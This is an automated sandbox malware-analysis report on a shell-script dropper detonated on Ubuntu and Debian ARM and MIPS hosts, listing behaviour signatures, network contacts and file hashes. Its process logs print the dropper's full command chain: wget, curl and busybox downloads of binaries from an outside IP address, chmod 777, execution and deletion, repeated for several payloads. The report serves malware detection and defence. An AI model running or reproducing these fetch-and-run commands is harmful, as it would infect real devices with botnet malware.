Analysis Overview
SHA256
bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb
Threat Level: Shows suspicious behavior
The file bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-21 08:15
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-21 08:15
Reported
2024-11-21 08:17
Platform
ubuntu1804-amd64-20240729-en
Max time kernel
32s
Max time network
131s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB | /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB | N/A |
| N/A | /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx | /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx | N/A |
| N/A | /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo | /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo | N/A |
| N/A | /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 | /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 | N/A |
| N/A | /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X | /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X | N/A |
| N/A | /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l | /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l | N/A |
| N/A | /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc | /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc | N/A |
| N/A | /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv | /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv | N/A |
| N/A | /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc | /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc | N/A |
| N/A | /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq | /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq | N/A |
| N/A | /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ | /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ | N/A |
| N/A | /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e | /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e | N/A |
| N/A | /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t | /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t | N/A |
| N/A | /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 | /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 | /usr/bin/curl | N/A |
Processes
/tmp/bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh
[/tmp/bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/bin/chmod
[chmod 777 aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
[./aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/bin/rm
[rm aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| GB | 185.125.188.62:443 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
| US | 151.101.65.91:443 | | tcp |
| GB | 84.17.50.9:443 | | tcp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| GB | 84.17.50.8:443 | 1527653184.rsc.cdn77.org | tcp |
Files
/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-21 08:15
Reported
2024-11-21 08:18
Platform
debian9-armhf-20240611-en
Max time kernel
53s
Max time network
82s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB | /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB | N/A |
| N/A | /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx | /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx | N/A |
| N/A | /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo | /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo | N/A |
| N/A | /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 | /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 | N/A |
| N/A | /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X | /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X | N/A |
| N/A | /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l | /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l | N/A |
| N/A | /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc | /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc | N/A |
| N/A | /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv | /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv | N/A |
| N/A | /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc | /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc | N/A |
| N/A | /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq | /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq | N/A |
| N/A | /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ | /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ | N/A |
| N/A | /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e | /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e | N/A |
| N/A | /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t | /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t | N/A |
| N/A | /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 | /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
Processes
/tmp/bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh
[/tmp/bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/bin/chmod
[chmod 777 aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
[./aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/bin/rm
[rm aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
memory/843-1-0xb6719000-0xb672a044-memory.dmp
memory/861-2-0xb6740000-0xb6751044-memory.dmp
memory/861-3-0xb6758000-0xb6769044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-21 08:15
Reported
2024-11-21 08:17
Platform
debian9-mipsbe-20240611-en
Max time kernel
151s
Max time network
155s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
Processes
/tmp/bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh
[/tmp/bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/bin/chmod
[chmod 777 aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
[./aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/bin/rm
[rm aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/usr/bin/wget
[wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/bin/chmod
[chmod 777 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
[./6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/bin/rm
[rm 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/usr/bin/wget
[wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/bin/chmod
[chmod 777 uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
[./uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/bin/rm
[rm uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/usr/bin/wget
[wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/bin/chmod
[chmod 777 d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
[./d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/bin/rm
[rm d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/usr/bin/wget
[wget http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]
/bin/chmod
[chmod 777 sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]
/tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
[./sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]
/bin/rm
[rm sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-21 08:15
Reported
2024-11-21 08:17
Platform
debian9-mipsel-20240418-en
Max time kernel
81s
Max time network
84s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB | /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB | N/A |
| N/A | /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx | /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx | N/A |
| N/A | /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo | /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo | N/A |
| N/A | /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 | /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 | N/A |
| N/A | /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X | /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X | N/A |
| N/A | /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l | /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l | N/A |
| N/A | /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc | /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc | N/A |
| N/A | /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv | /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv | N/A |
| N/A | /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc | /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc | N/A |
| N/A | /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq | /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq | N/A |
| N/A | /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ | /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ | N/A |
| N/A | /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e | /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e | N/A |
| N/A | /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t | /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t | N/A |
| N/A | /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 | /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc | /usr/bin/curl | N/A |
Processes
/tmp/bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh
[/tmp/bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/bin/chmod
[chmod 777 aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
[./aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/bin/rm
[rm aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |